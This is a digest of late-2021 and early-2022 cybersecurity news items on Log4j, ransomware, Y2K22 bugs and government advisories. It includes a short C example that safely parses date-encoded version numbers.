    Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure

    CISA, the FBI, and NSA encourage the cybersecurity community—especially critical infrastructure network defenders—to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.

    If Hackers Are Exploiting the log4j Flaw, CISA Says We Might Not Know Yet

    Federal officials cautioned Monday that, while the widespread Log4j vulnerability hasn’t led to any major known intrusions in the U.S., there could be a “lag” between when the flaw became known, and when attackers exploit it. Cybersecurity and Infrastructure Security Agency Director Jen Easterly said that there were months between the discovery of the vulnerability that led to the 2017 Equifax breach, which exposed the personal information of nearly 150 million Americans, and word of the breach itself, invoking one of the most notable hacks in history.

    US NCSC and DoS Share Best Practices Against Surveillance Tools

    The US National Counterintelligence and Security Center (NCSC) and the Department of State have published joint guidance that provides best practices on defending against attacks carried out by threat actors using commercial surveillance tools. In the last few years, we have reported several cases of companies selling commercial surveillance tools to governments and other entities that have used them for malicious purposes.

    SonicWall Email Security and Firewall Products Impacted by the Y2K22 Vulnerability

    Last week, Internet appliance provider SonicWall revealed that the Y2K22 bug has affected several of its email security and firewall products, breaking message log updates and junk box functions starting January 1st, 2022. Although SonicWall gave no details on what causes the Y2K22 problem in its products, the company is not the only one dealing with it.

    Researchers Find Bugs in Over A Dozen Widely Used URL Parser Libraries

    In a deep-dive analysis jointly conducted by cybersecurity firms Claroty and Snyk, eight security vulnerabilities were identified in as many third-party URL parsing libraries written in C, JavaScript, PHP, Python, and Ruby and used by many web applications. With URLs being a fundamental mechanism by which resources, located either locally or on the web, can be requested and retrieved, differences in how the parsing libraries interpret a URL could pose significant risk for users.

    Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech

    A Chinese national has pleaded guilty to the theft of agricultural trade secrets from the US, intended for delivery to scientists in China. Xiang Haitao, formerly of Chesterfield, Missouri, worked at Monsanto and its subsidiary, The Climate Corporation, between 2008 and 2017, the US Department of Justice (DoJ) said on Thursday. Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One component of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered "a valuable trade secret and their intellectual property".

    Night Sky, A New Ransomware Operation in the Threat Landscape

    Researchers from MalwareHunterTeam first spotted a new ransomware family dubbed Night Sky that uses a double extortion model in attacks aimed at businesses. Once a file is encrypted, the ransomware appends the '.nightsky' extension to its name. The gang started operations on December 27, 2021, and has already breached the corporate networks of two organizations, in Bangladesh and Japan respectively. It has also set up a leak site on the Tor network where it publishes files stolen from victims who do not pay the ransom.

    New Mexico's Bernalillo County Investigates Ransomware Attack

    Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality.

    QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices

    QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. If your organization's NAS is exposed to the Internet it is likely to be targeted if the following text is displayed on the software’s dashboard, “The System Administration service can be directly accessible from an external IP address via the following protocols: HTTP

    Have I Been Pwned Warns of Datpiff Data Breach Impacting Millions

    DatPiff is a popular mixtape hosting service used by over 15 million users, allowing unregistered users to download or upload samples for free. The cracked passwords for almost 7.5 million members are being sold online, and users can check if they are part of the data breach through the Have I Been Pwned notification service.

    Phishing Campaign Leverages Covid-Induced Adjustments to Banking Practices

    This is another example of attackers leveraging covid and a well-designed phishing page to launch a dangerous campaign. Covid-themed phishing emails have convinced users to relinquish valuable credentials throughout the last year. Phish impersonating major banking firms have been around for some time, but they constantly evolve. The pandemic is continuing to affect the lives of everyone in the world, and threat actors are attempting to hook their targets by relying on changes in banking practices related to the pandemic.

    New Mac Malware Samples Underscore Growing Threat

    For the sixth year in a row, security researcher Patrick Wardle has released a list of all the new Mac malware threats that emerged over the course of a year. For each family, Wardle identified the infection vector, installation and persistence mechanisms, and other features such as the malware's purpose. A sample of each new Mac malware family that surfaced last year is available on his website.

    FTC Warns Companies to Secure Consumer Data from Log4J Attacks

    The US Federal Trade Commission (FTC) warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks. "The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the agency said.

    Microsoft Code-sign Check Bypassed to Drop Zloader Malware

    A new Zloader campaign exploits Microsoft's digital signature verification to deploy malware payloads and steal user credentials from thousands of victims in 111 countries. The campaign, orchestrated by a threat group known as MalSmoke, appears to have started in November 2021 and is still going strong, according to Check Point researchers who spotted it.

    Researchers Used Electromagnetic Signals to Classify Malware Infecting IoT Devices

    A team of academics (Duy-Phuc Pham, Damien Marion, Matthieu Mastio and Annelie Heuser) from the Research Institute of Computer Science and Random Systems (IRISA) has devised a new approach that analyzes electromagnetic field emanations from Internet of Things (IoT) devices to detect highly evasive malware. The team presented its technique at the Annual Computer Security Applications Conference (ACSAC) that took place in December.

    This iOS 15 Bug Could Crash Your iPhone Permanently

    A security researcher has publicly disclosed a bug present in iOS 15.2 (and going back to iOS 14.7 and possibly earlier) relating to HomeKit that could be used to permanently crash an iPhone. Trevor Spiniolas found that changing the name of a HomeKit device to a very large string (Spiniolas used 500,000 characters for testing) would crash the associated iPhone.

    Monopoly Market Potentially Exit Scamming

    The decentralised darknet market, Monopoly, appears to be exit scamming. Monopoly has been open for two years and had gained a reputation for being stable. This was in large part due to its unique method of vendor verification which was believed to keep vendor scamming to a minimum.

    Log4j Highlights Need for Better Handle on Software Dependencies

    Security experts learned a lot from the fallout of Log4Shell. Most importantly, the incident highlighted the need for organizations to “understand and manage” what code is running within their software environments. Software dependencies exist in just about every enterprise product, when flaws emerge in these dependencies, organizations are left scrambling for fixes. Third party dependencies are essential in creating modern day programs as programmers do not have to reinvent the wheel every time a new product or application is developed. By mixing and matching existing libraries and packages, software developers can build new applications more efficiently.

    UK Defence Academy Attack Forced IT Rebuild – Report

    A possible nation-state attack on the UK's primary defense training facility last year forced the academy to rebuild its IT infrastructure, according to a former senior officer. Air Marshal Edward Stringer served as director-general of joint force development and of the UK Defence Academy before recently retiring. The academy trains nearly 30,000 UK armed forces personnel annually, alongside civil servants and military staff from other nations. However, it was caught out by a cyber-attack last March, which had "significant" operational consequences, Stringer told Sky News.

    Why the UK’s Energy Sector is Fragile and Ripe to Cyber Attacks

    For the first time in a generation, the UK is in the middle of an unprecedented supply chain crisis, and in recent weeks we have seen very clearly its immediate and far-reaching impacts. Whether it is the shortage of truck drivers prompting panic-buying at fuel stations that required military intervention, or the stockpiling of materials and goods that UK businesses are doing to cope with shortages during the festive season, never has the UK's supply chain been stretched so thin. There are real fears this could rip through an economy that has only just started recovering from COVID-19.

    Purple Fox Malware Distributed via Malicious Telegram Installers

    A malicious Telegram for Desktop installer distributes the Purple Fox malware to install further malicious payloads on infected devices. The installer is a compiled AutoIt script named "Telegram Desktop.exe" that drops two files: an actual Telegram installer and a malicious downloader. The legitimate Telegram installer dropped alongside the downloader is never executed, but the AutoIt program does run the downloader.

    Don't Copy-paste Commands from Webpages — You Can Get Hacked

    Programmers, sysadmins, security researchers, and tech hobbyists who copy and paste commands from web pages into a console or terminal are warned that they risk having their system compromised. A technologist has demonstrated a simple trick that will make you think twice before copying and pasting text from web pages (Bleeping Computer, 2022). Gabriel Friedlander, founder of the security awareness training platform Wizer, showed an obvious yet surprising hack: a web page can put different text on the clipboard than what the visitor selected, so the command that gets pasted is not the one that was read. It isn't unusual for novice and skilled developers alike to copy commonly used commands from a web page such as StackOverflow and paste them into their applications, a Windows command prompt or a Linux terminal.

    Microsoft Rolled Out Emergency Fix for Y2k22 Bug in Exchange Servers

    Microsoft has rolled out an emergency fix for the Y2k22 bug that has been breaking email delivery on on-premises Microsoft Exchange servers since January 1st, 2022. "We have addressed the issue causing messages to be stuck in transport queues of on-premises Exchange Server 2016 and Exchange Server 2019. The problem relates to a date check failure with the change of the new year and it is not a failure of the AV engine itself. This is not an issue with malware scanning or the malware engine, and it is not a security-related issue," reads the post published by Microsoft. "The version checking performed against the signature file is causing the malware engine to crash, resulting in messages being stuck in transport queues."
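
    The failure that both the SonicWall entry above and this Exchange entry describe is a date-encoded version number of the form YYMMDDHHMM overflowing a signed 32-bit field once the year rolled over to 22: 2201010001 exceeds INT32_MAX (2147483647), whereas every 2021 stamp fit. The C below is an added example, not code from Microsoft, SonicWall or the page: it parses such a version with the overflow checked before any narrowing to 32 bits, and compares versions in 64 bits so that an impossible but still-ordered stamp such as 2112330001 (the value the Microsoft interim fix is reported to have used, which fits and still sorts after every real 2021 stamp) is handled correctly.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Parse a decimal version string (e.g. "2201010001", YYMMDDHHMM) into a
 * 64-bit value. Returns 1 on success, 0 if the string is empty, contains
 * a non-digit, or has more digits than fit safely. *out receives the value.
 */
static int parse_version_i64(const char *s, int64_t *out)
{
	int64_t acc = 0;
	int ndigits = 0;

	for (; *s; s++, ndigits++) {
		if (*s < '0' || *s > '9' || ndigits >= 18)
			return 0;
		acc = acc * 10 + (*s - '0');
	}
	if (ndigits == 0)
		return 0;
	*out = acc;
	return 1;
}

/* Does the version fit a signed 32-bit field? The check happens on the
 * 64-bit value, before any narrowing conversion, so nothing overflows. */
static int version_fits_int32(const char *s)
{
	int64_t v;
	return parse_version_i64(s, &v) && v <= INT32_MAX;
}

/* Compare two versions as 64-bit integers: -1, 0 or 1. Invalid input is
 * treated as smaller than any valid version. */
static int version_cmp(const char *a, const char *b)
{
	int64_t va = -1, vb = -1;
	parse_version_i64(a, &va);
	parse_version_i64(b, &vb);
	return (va > vb) - (va < vb);
}

int main(void)
{
	/* Constructed samples: last stamp of 2021, first of 2022, and the
	 * out-of-range-but-ordered workaround value. */
	const char *samples[] = { "2112312359", "2201010001", "2112330001" };
	for (int i = 0; i < 3; i++)
		printf("%s fits int32: %s\n", samples[i],
		       version_fits_int32(samples[i]) ? "yes" : "no");
	printf("2112330001 > 2112312359: %d\n",
	       version_cmp("2112330001", "2112312359") == 1);
	return 0;
}
```

    The lesson for anyone who encodes a date into an integer version field is in `version_fits_int32`: decide the field width from the largest value the scheme can ever produce, and reject or widen before the narrowing conversion rather than letting a crash in a signature loader discover the limit on New Year's Day.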

    UK Security Agency Shares 225M Passwords With 'Have I Been Pwned'

    The UK's National Crime Agency (NCA) and National Cyber Crime Unit (NCCU) have contributed 225 million new compromised email addresses and associated passwords to Have I Been Pwned (HIBP), a free service that tracks stolen credentials so people can learn whether theirs have been breached. During recent NCA operations, the NCCU's Mitigation@Scale team identified more than 585.5 million potentially compromised credentials (email addresses and associated passwords) in a compromised cloud storage facility. In a statement on HIBP, the NCA says analysis revealed the credentials represented an accumulation of known and unknown datasets.

    3 Reasons Why You Should Fuzz Your Christmas Tree

    Christmas trees are often decorated with smart lights that are connected to Wi-Fi. Vulnerabilities in such hardware can be an entry point for attackers who want to hack Christmas. How easily such vulnerabilities can be exploited became clear in a 2018 study, in which security researchers managed to completely shut down Christmas decorations remotely. In other instances, IoT devices were hacked over the cloud and even set on fire.

    Logistics Giant Warns of Scams Following Ransomware Attack

    Hellmann is one of the largest international logistics providers. Founded in 1871, it handles 16 million shipments per year by air, sea, road, and rail, and is active in 173 countries. The logistics giant has issued a warning that data was stolen from the company when it was hit by a ransomware attack on December 9, 2021. It is not entirely clear what type of data was taken, but the company says it is warning partners and customers, as a precaution, to double-check their communications with it. Criminals could use the leaked data to make social engineering attacks more believable, so Hellmann is asking people who do business with it to look out for fraudulent emails and calls.

    Apache’s New Security Update for HTTP Server Fixes Two Flaws

    Apache HTTP Server is the second most widely used web server on the internet behind Nginx, according to W3Techs, which estimates it's used by 31.4% of the world's websites. UK security firm Netcraft estimates 283 million websites used Apache HTTP Server in December 2021, representing 24% of all web servers. The Apache Software Foundation has released an update to address a critical flaw in its hugely popular web server that allows remote attackers to take control of a vulnerable system.

    Alibaba Suffers Government Crackdown Over Log4j

    Chinese tech giant Alibaba has reportedly been shunned by China’s top tech regulator for failing to report the infamous Log4j vulnerability quickly enough. Local media claimed that the firm’s Alibaba Cloud business, which has a large team of security researchers, failed to report the issue to the Ministry of Industry and Information Technology (MIIT)

    Russia and Ukraine: avoiding war

    As 2021 draws to a close, there are increasing fears around the world that Russia is planning to invade Ukraine in an effort to prevent its former ally from moving further towards the West and possibly even joining the NATO military alliance. The tensions between these two former Soviet states are now at a critical point, with the potential to evolve into further, more widespread conflict between Russia and the West.

    The Pysa Ransomware Strain Just Started Targeting Lots More Businesses

    The relatively new Pysa ransomware was the dominant strain behind file-encrypting attacks in November and saw a 400% rise in attacks on government organizations, according to an analysis by security company NCC Group. Pysa is one of the ransomware gangs utilizing double extortion to pressure victims into paying an extortion demand, and it dumped leaks from 50 previously compromised organizations last month. Overall in November, the number of Pysa attacks increased 50%, which means it overtook Conti to join Lockbit in the top two most common versions of the malware. Conti and Lockbit have been the dominant strains since August, according to NCC Group.

    Russian National Extradited to US for Trading on Stolen Information

    The Russian national Vladislav Klyushin (41) was extradited to the United States from Switzerland to face charges for his alleged role in a scheme whose participants traded on information stolen from U.S. companies. The man was arrested in Switzerland on March 21, 2021, along with four other accomplices with whom he allegedly conspired to gain unauthorized access to computers and to commit wire fraud and securities fraud.

    New joint advisory from CISA, FBI, NSA, and the other Five Eyes (Australia, Canada, New Zealand, UK)

    The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance on addressing vulnerabilities in Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited. CISA, in collaboration with industry members of CISA’s Joint Cyber Defense Collaborative (JCDC), previously published guidance on Log4Shell for vendors and affected organizations in which CISA recommended that affected organizations immediately apply appropriate patches (or apply workarounds if unable to upgrade), conduct a security review, and report compromises to CISA or the FBI. CISA also issued an Emergency Directive directing U.S. federal civilian executive branch (FCEB) agencies to immediately mitigate Log4j vulnerabilities in solution stacks that accept data from the internet. This joint CSA expands on the previously published guidance by detailing steps that vendors and organizations with IT and/or cloud assets should take to reduce the risk posed by these vulnerabilities. These steps include:

    • Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities,
    • Upgrading Log4j assets and affected products to the latest version as soon as patches are available and remaining alert to vendor software updates, and
    • Initiating hunt and incident response procedures to detect possible Log4Shell exploitation.

    Four Bugs in Microsoft Teams Left Platform Vulnerable Since March

    Researchers from Positive Technologies, a leading global provider of enterprise security solutions for vulnerability and compliance management, incident and threat analysis, and application protection, discovered four vulnerabilities in Microsoft Teams that could be leveraged for various malicious purposes. Microsoft Teams is a collaboration tool that helps people working in different geographic locations work together online. For this reason, usage of the platform has risen during the pandemic, making it an increasingly attractive target for threat actors.

    2easy Now a Significant Dark Web Marketplace for Stolen Data

    This particular dark web marketplace has grown significantly over the past few years; by automating processes, owners have increased sales volume and overall customer satisfaction. They have removed the one-on-one interaction with sellers and posters of stolen data altogether; anyone can create an account, add money to their wallet, and make purchases without interacting with the sellers directly.

    Threat Actors Continue to Leverage Log4J

    The Conti ransomware gang, which became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability last week, has built up a holistic attack chain. The sophisticated Russia-based Conti group – which Palo Alto Networks has called "one of the most ruthless" of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.

    FBI: Hackers Are Actively Exploiting This Flaw on Manageengine Desktop Central Servers

    We received an alert from the FBI last Friday regarding a zero-day vulnerability in Zoho ManageEngine Desktop Central, CVE-2021-44515. ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products. The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.

    Third Log4J Bug Can Trigger DoS; Apache Issues Patch

    No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug. Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to the potential for denial-of-service (DoS) in Apache’s initial patch.

    Ukrainian War Games Test Electricity Grid

    Hundreds of Ukrainian cyber experts have taken part in a large-scale incident response exercise against the country’s energy grid as geopolitical tensions with Russia continue to escalate. President Putin on Friday issued a series of security demands, including that NATO limits deployments of troops and weapons to Ukraine’s eastern border with Russia and that the country commits to never joining the military alliance. It warned of a military crisis in the region if its demands weren’t met. Russia has already massed 100,000 troops, alongside missiles and artillery, on its side of the border

    A New Attack Vector Exploits the Log4Shell Vulnerability on Servers Locally

    Researchers from cybersecurity firm Blumira devised a new attack vector that relies on a JavaScript WebSocket connection to exploit the Log4Shell vulnerability on internal and locally exposed unpatched Log4j applications. Experts pointed out that this new attack vector significantly expands the attack surface and can impact services running only on localhost that were never exposed to any network.

    APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central

    Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers. The APT actors were observed compromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials.

    Holiday White House Letter Emphasizes the Importance of a Sense of Heightened Security

    The holidays are an opportunity to spend time with our loved ones and enjoy some well-earned rest. Unfortunately, malicious cyber actors are not taking a holiday – and they can ruin ours if we’re not prepared and protected. Historically we have seen breaches around national holidays because criminals know that security operations centers are often short-staffed, delaying the discovery of intrusions. Beyond the holidays, though, we’ve experienced numerous recent events that highlight the strategic risks we all face because of the fragility of digital infrastructure and the ever-present threat of those who would use it for malicious purposes.

    Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges

    Microsoft and Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit the Log4j vulnerabilities. "MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications. In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their specific targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems."

    Log4j Flaw: Now State-Backed Hackers Are Using Bugs as Part of Attacks, Warns Microsoft

    State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft. As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It's a potent flaw that allows remote attackers to take over a device after compromise.

    CISA: Immediate Steps to Strengthen Critical Infrastructure against Potential Cyberattacks

    In the lead up to the holidays and in light of persistent and ongoing cyber threats, CISA urges critical infrastructure owners and operators to take immediate steps to strengthen their computer network defenses against potential malicious cyber attacks. Sophisticated threat actors, including nation-states and their proxies, have demonstrated capabilities to compromise networks and develop long-term persistence mechanisms. These actors have also demonstrated capability to leverage this access for targeted operations against critical infrastructure with potential to disrupt National Critical Functions.

    Second log4j Vulnerability Discovered, Patch to version 2.16

    A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228. The description of the new vulnerability, CVE-2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was "incomplete in certain non-default configurations." "This could allow attackers... to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DoS) attack," the CVE description says.

    ‘Seedworm’ Attackers Target Telcos in Asia, Middle East

    Attackers targeting telcos across the Middle East and Asia for the past six months are linked to Iranian state-sponsored hackers, according to researchers. The cyberespionage campaigns leverage a potent cocktail of spear phishing, known malware and legitimate network utilities to steal data and potentially disrupt supply chains.

    Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware

    Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files.

    Western Digital SanDisk SecureAccess Flaws Allow Brute Force and Dictionary Attacks

    Western Digital has released updates for its SanDisk SecureAccess software to fix multiple vulnerabilities that can be exploited to access user data by carrying out brute force and dictionary attacks. The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user's private vault is protected by a personal password, and all the files are automatically encrypted.

    Kronos Ransomware Attack May Cause Weeks of HR Solutions Downtime

    Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks. Kronos is a workforce management and human resources provider that offers cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.

    Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation

    The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.

    Researchers Explore Microsoft Outlook Phishing Techniques

    Some of the tools built into Outlook to boost productivity and collaboration could also make it easier to launch effective social engineering campaigns, researchers say.
    In early December, researchers with Avanan discovered a way in which Outlook's features could be used to make an attacker appear more credible in a phishing or business email compromise (BEC) attack. Their attack started with a spoofed email. If an attacker had a private server, they could launch a domain impersonation attack with an email pretending to come from another sender

    Kali Linux 2021.4 Released with 9 New Tools, Further Apple M1 Support

    Kali Linux 2021.4 was released today by Offensive Security and includes further Apple M1 support, increased Samba compatibility, nine new tools, and an update for all three main desktops.
    Kali Linux is a Linux distribution allowing cybersecurity professionals and ethical hackers to perform penetration testing and security audits against internal and remote networks. With this release, the Kali Linux Team introduces a bunch of new features, including:

    • Apple M1 support for the VMware Fusion Public Tech Preview
    • Wide compatibility is enabled for Samba
    • Making it easier to switch to Cloudflare's package manager mirror
    • Kaboxer updated with support for window themes and icon theme
    • Updates to the Xfce, GNOME and KDE desktops
    • Raspberry Pi Zero 2 W + USBArmory MkII ARM images
    • Nine more tools

    A Zero-day Exploit for Log4j Java Library Could Have a Tsunami Impact on IT Giants

    Experts have publicly disclosed proof-of-concept exploits for a critical remote code execution zero-day vulnerability, tracked as CVE-2021-44228 (aka Log4Shell), in the Apache Log4j Java-based logging library. The Chinese security researcher p0rz9, who publicly disclosed the PoC exploit code, revealed that CVE-2021-44228 can only be exploited if the log4j2.formatMsgNoLookups option is set to false.

    Vulnerability Alert: Elevated Ransomware Risk in Unpatched, EOL SonicWall SRA and SMA 8.x Products

    Mandiant (previously FireEye) and SonicWall joined forces and discovered that ransomware actors are currently leveraging previously disclosed SonicWall vulnerabilities to deploy ransomware on networks. As in the past, threat actors are actively targeting Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life (EOL) 8.x firmware, and are using stolen credentials.

    LINE Pay Leaks Data from Approximately 133,000 Users to GitHub of All Places

    LINE Pay, a smartphone payment provider, announced yesterday that between September and November of this year, approximately 133,000 users’ payment details were inadvertently published on GitHub. A research group employee accidentally uploaded files detailing participants in a LINE Pay promotional programme staged between late December 2020 and April 2021 to the collaborative coding crèche.

    Was Threat Actor KAX17 De-anonymizing the Tor Network?

    A mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers in the Tor network, whose daily total of servers typically hovers around 9,000-10,000. Servers added to the Tor network typically must have contact information included in their setup, such as an email address, so Tor network administrators and law enforcement can contact server operators in the case of a misconfiguration or file an abuse report.

    Arrow RAT: new malware launched on darknet forums

    A new remote access Trojan (RAT) known as Arrow RAT has been promoted on the darknet forum XSS by the user Mega_Knight. According to @Mega_Knight, Arrow RAT contains numerous features that are typical of RATs, including keylogging, registry modification, extraction of passwords stored in browsers, and hiding files or folders. Arrow RAT also contains a hidden virtual network computing (hVNC) module, enabling the attacker to launch a hidden virtual desktop on an infected device.

    SonicWall ‘Strongly Urges’ Customers to Patch Critical SMA 100 Bugs

    SonicWall 'strongly urges' organizations using SMA 100 series appliances to immediately patch them against multiple security flaws rated with CVSS scores ranging from medium to critical. The bugs (reported by Rapid7's Jake Baines and NCC Group's Richard Warren) impact SMA 200, 210, 400, 410, and 500v appliances even when the web application firewall (WAF) is enabled.

    Canadian Indicted for Launching Ransomware Attacks on Orgs in US, Canada

    Officials from the Ontario Provincial Police held a press conference on Tuesday to announce the charges and Philbert's arrest in Ottawa. In a statement, US Attorney Bryan Wilson of the District of Alaska said Philbert "conspired with others known and unknown to the United States to damage computers, and in the course of that conspiracy did damage a computer belonging to the State of Alaska in April 2018." Wilson and Canadian officials noted that they received help in the case from Dutch authorities and Europol

    Emotet Directly Drops Cobalt Strike Beacons Without Intermediate Trojans

    Emotet malware now directly installs Cobalt Strike beacons to give the attackers immediate access to the target network and allow them to carry out malicious activities, such as launching ransomware attacks. In a classic attack chain, the Emotet malware would install the TrickBot or Qbot trojans on infected devices, which in turn would deploy Cobalt Strike on an infected system. Emotet research group Cryptolaemus recently noticed a switch in the tactics of Emotet operators, which now are directly installing Cobalt Strike beacons on infected devices without installing the above intermediate Trojans.

    Unitrends Security Advisory

    Multiple vulnerabilities were recently reported to Unitrends and Kaseya within the Unitrends Recovery Series and Unitrends Agent Software. Unitrends and Kaseya gave high priority to these reports, as the company does with any report of a potential security issue, and has addressed the following vulnerabilities with the 10.5.5 software release.

    Someone Is Running Lots of Tor Relays

    Since 2017, someone has been running about a thousand — 10% of the total — Tor servers in an attempt to deanonymize the network: Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point. The actor’s servers are typically located in data centers spread all over the world and are typically configured as entry and middle points primarily, although KAX17 also operates a small number of exit points.

    A Critical Zoho ManageEngine Desktop Central and Desktop Central MSP Vulnerability Is Exploited by an APT Actor

    Zoho ManageEngine Desktop Central is a popular management tool that administrators use for automatic software distribution and remote troubleshooting across the whole network. An authentication bypass vulnerability in ManageEngine Desktop Central MSP has been discovered, allowing an attacker to overcome authentication and execute arbitrary code on the Desktop Central MSP server.

    Twitter Bots Pose as Support Staff to Steal Your Cryptocurrency

    Scammers monitor every tweet containing requests for support on MetaMask, TrustWallet, and other popular crypto wallets, and respond to them with scam links in just seconds. To conduct these targeted phishing attacks, scammers abuse Twitter APIs that allow them to monitor all public tweets for specific keywords or phrases.

    QNAP Warns Users of Bitcoin Miner Targeting Their NAS Devices

    QNAP warned customers today of ongoing attacks targeting their NAS (network-attached storage) devices with cryptomining malware, urging them to take measures to protect them immediately. The cryptominer deployed in this campaign on compromised devices will create a new process named [oom_reaper] that will mine for Bitcoin cryptocurrency.

    Zoho: ManageEngine Desktop Central and Desktop Central MSP

    Zoho has released a security advisory to address an authentication bypass vulnerability in ManageEngine Desktop Central and Desktop Central MSP that could result in remote code execution. If exploited, attackers can gain unauthorized access to the product by sending a specially crafted request, leading to remote code execution. The severity of this vulnerability is rated critical.

    Suspected Russian Activity Targeting Government and Business Entities Around the Globe

    As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by defenders seeking to stay one step ahead.

    Magnat Malvertising Campaigns Spread Malicious Chrome Extensions, Backdoors and Info Stealers

    Talos researchers spotted a series of malvertising campaigns using fake installers of popular apps and games as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension. According to Talos, the threat actor has been active at least since late 2018; experts observed intermittent activity towards the end of 2019 and through early 2020. The group resurfaced in April 2021, and its malvertising campaigns targeted users in Canada, the U.S., Australia, Italy, Spain, and Norway.

    Malicious KMSPico Windows Activator Stealing Users' Cryptocurrency Wallets

    Users looking to activate Windows without using a digital license or a product key are being targeted by tainted installers to deploy malware designed to plunder credentials and other information in cryptocurrency wallets. KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office suite without actually owning a license key.

    Microsoft Offers 50% Subscription Discounts to Office Pirates

    Microsoft is offering discounts of up to 50% on Microsoft 365 subscriptions to those using pirated versions of Microsoft Office who are willing to switch to a genuine version. This promotional offer is sent to Office users if Microsoft detects the version installed is non-genuine, and it shows as an alert under the top menu, as first reported by Ghacks.

    Phishing Campaigns by the Nobelium Intrusion Set

